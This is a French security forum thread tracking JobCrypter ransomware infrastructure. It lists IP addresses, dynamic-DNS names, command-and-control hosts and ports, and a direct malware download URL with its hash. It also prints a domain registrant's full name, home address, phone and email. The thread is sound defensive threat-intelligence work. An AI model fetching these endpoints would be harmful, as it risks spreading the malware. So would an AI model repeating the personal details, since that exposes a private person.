ANDROID.SH ( 213.136.92.111 | 82.165.155.223 )
Status : Live
Expiry : 2017-07-13

inetnum: 213.136.80.0 - 213.136.94.255
descr: Contabo GmbH / Giga-Hosting GmbH
name: CONTABO
+ 2 comptes dyndns ( thx @malwarehunterteam )
↘ DJDID.MYFTP.BIZ
↘ WINSYSTEM.MYVNC.COM
87.106.18.150 | 87.106.0.0/16 | DE | 2005-08-10 | ONEANDONE-AS 1&1 Internet AG,DE
87.106.111.99 | 87.106.0.0/16 | DE | 2005-08-10 | ONEANDONE-AS 1&1 Internet AG,DE
89.46.104.35 | 89.46.104.0/21 | IT | 2005-11-29 | ARUBA-ASN Aruba S.p.A.,IT
109.203.100.122 | 109.203.100.0/23 | GB | 2010-03-03 | NODE4-AS Node4 Limited,GB
213.136.92.111 | 213.136.92.0/23 | DE | 2000-02-28 | CONTABO Contabo GmbH,DE
217.160.206.177 | 217.160.0.0/16 | DE | ONEANDONE-AS 1&1 Internet SE, DE


→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:30/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:31/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:32/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:33/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:34/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:35/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:36/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:37/TCP
→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:1219/TCP


Liens connexes:
http://research.zscaler.com/2016/01/yet ... pymel.html
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: JobCrypter & les activités carding de djamel au bled

Message par Malekal_morte » 24 févr. 2016 13:56

Merci ѠOOT pour toutes ces informations.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87319
Inscription : 10 sept. 2005 13:57
Contact :

Re: JobCrypter & les activités carding de djamel au bled

Message par Malekal_morte » 22 avr. 2016 10:01

Cette semaine, une nouvelle campagne a eu lieu.
Le ransomware utilise l'extension .CSS donc j'ai mis à jour la fiche de ce dernier :
=> jobcrypter-geniesanstravaille-extension ... ml#p419085
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Re: JobCrypter & les activités carding de djamel au bled

Message par ѠOOT » 16 mai 2016 19:22

HAGROUNASADIKI.COM ( 217.160.0.2 )

Created on 2015-12-12 - Expires on 2017-05-15 - Updated on 2016-05-15

Registrant Name: Celine Courbot
Registrant Street: 5 rue du mont mirel
Registrant City: MAROMME
Registrant Postal Code: 76150
Registrant Country: FRANCE
Registrant Phone: 06.69.12.00.35
Registrant Email: celine.courbot@sfr.fr

% DNS Keywords Analysis : "hagrouna"+"sadiki"

Phrase culte en Algérie : prononcée par un supporter algérien au stade d'Oum Dourman lors du match de barrage Algérie-Egypte durant les qualifications pour la Coupe du monde en novembre 2009.
→ http://hagrounasadiki.com/sBuild1.exe 84F2B1EF959D96970C899E581905C333 ( 16 May 2016 01:15:13 )

Image

Le "svchost.exe" est signé par HOTEL RESTAURANT LA TREILLE

Image

→ C2 : UPDATE.MICROSOFTDOWNLOADING.COM:1244/TCP
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ


Répondre

Revenir vers « Tech, Tips & Tricks »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 2 invités